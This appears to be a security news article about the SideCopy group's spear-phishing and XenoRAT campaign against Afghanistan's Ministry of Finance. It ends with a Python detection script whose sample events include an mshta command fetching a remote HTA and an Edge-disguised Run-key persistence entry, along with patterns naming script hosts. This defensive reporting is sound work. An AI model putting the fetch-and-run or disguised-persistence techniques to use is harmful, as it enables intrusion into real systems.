A Pakistan-linked cyber espionage group known as SideCopy has been attributed a targeted cyberattack against Afghanistan’s Ministry of Finance. Security researchers identified the operation and named it Operation XENOFISCAL. The campaign was specifically aimed at finance-related government offices across Afghanistan. Investigators believe the attackers were conducting a focused intelligence-gathering operation rather than a large-scale malware campaign.

The attack reportedly began with a spear-phishing email containing a ZIP archive. Inside the archive was a file disguised as an official PDF document. In reality, the file was a malicious Windows shortcut designed to start the infection process. The file name was written in Pashto, making it appear legitimate to government employees.
The fake document claimed to contain information about officials selected for a seminar related to intellectual and psychological warfare. Researchers believe this theme was carefully chosen to attract the attention of government workers. The use of the local language and government-related content increased the chances of victims opening the file. This showed that the attackers had researched their targets before launching the operation.

Once the malicious file was opened, it silently activated a multi-stage infection chain. The attackers used mshta.exe, a legitimate Windows utility, to download additional malicious files. These files were reportedly hosted on a compromised Afghan education website. By abusing trusted Windows tools, the attackers attempted to avoid detection by traditional security software.
The downloaded payload then executed heavily obfuscated JavaScript code directly in memory. The malware also created persistence mechanisms inside the Windows Registry to survive system restarts. Some registry entries were disguised as Microsoft Edge components to appear legitimate. These techniques helped the malware remain hidden for longer periods of time.
The final stage of the attack involved the deployment of XenoRAT version 1.8.7. This Remote Access Trojan allowed the attackers to remotely control infected systems. Once installed, the malware established encrypted communication with command-and-control servers. Researchers noted that the infrastructure was designed to remain operational even if some parts of the operation were discovered.
Investigators also found that the attackers dropped a document containing what appeared to be an Afghan Ministry of Finance staff directory. The file reportedly included information related to finance officials and revenue offices from all 34 provinces. Researchers believe this indicates extensive reconnaissance before the attack took place. Such information could have helped the attackers make their phishing campaign more convincing.
Security experts recommend monitoring suspicious executions of mshta.exe, unexpected registry modifications, unusual scheduled tasks, and unauthorized external network connections. The incident highlights how modern threat actors are increasingly combining social engineering with legitimate system tools. It also demonstrates the growing use of fileless and stealth-focused techniques in cyber espionage campaigns targeting government organizations.
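The monitoring recommendations above can be turned into concrete detection logic. The following Python script is an added example, not code from the original article or from the researchers who analysed the incident; the Sysmon-style events, hostnames, paths and registry value names in it are constructed placeholders, not indicators from the actual operation.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape (not real data from the incident).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe https://compromised-site.invalid/news/stage1.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Apps\Intranet\dashboard.hta"},  # benign local HTA
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "MicrosoftEdgeUpdate",
     "data": r'mshta.exe "C:\Users\user\AppData\Roaming\Edge\update.hta"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "MicrosoftEdgeUpdate",  # genuine-looking Edge updater entry
     "data": r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c'},
]

URL_RE = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\b(mshta|wscript|cscript|powershell|rundll32|regsvr32)(\.exe)?\b",
                            re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)

def check_mshta(event):
    """Flag mshta.exe fetching a remote script or running one from a user-writable path."""
    if event.get("type") != "process" or not event["image"].lower().endswith("\\mshta.exe"):
        return None
    cmd = event["cmdline"]
    if URL_RE.search(cmd):
        return "mshta.exe launched with a remote URL argument"
    if USER_WRITABLE_RE.search(cmd):
        return "mshta.exe running a script from a user-writable directory"
    return None

def check_run_key(event):
    """Flag Run-key persistence whose name imitates Edge but whose data invokes a script host."""
    if event.get("type") != "registry" or not RUN_KEY_RE.search(event["key"]):
        return None
    if "edge" in event["value"].lower() and SCRIPT_HOST_RE.search(event["data"]):
        return "Run key named like an Edge component but launching a script host"
    return None

def scan(events):
    """Return (event index, reason) for every event that trips a check."""
    hits = []
    for i, ev in enumerate(events):
        for check in (check_mshta, check_run_key):
            reason = check(ev)
            if reason:
                hits.append((i, reason))
    return hits

if __name__ == "__main__":
    for i, reason in scan(SAMPLE_EVENTS):
        print(f"event {i}: {reason}")
```

Only the remote mshta.exe download and the Edge-named Run key that points at a script host are flagged; the local HTA and the genuine updater entry pass, which is the distinction a triage rule for this tradecraft needs to make.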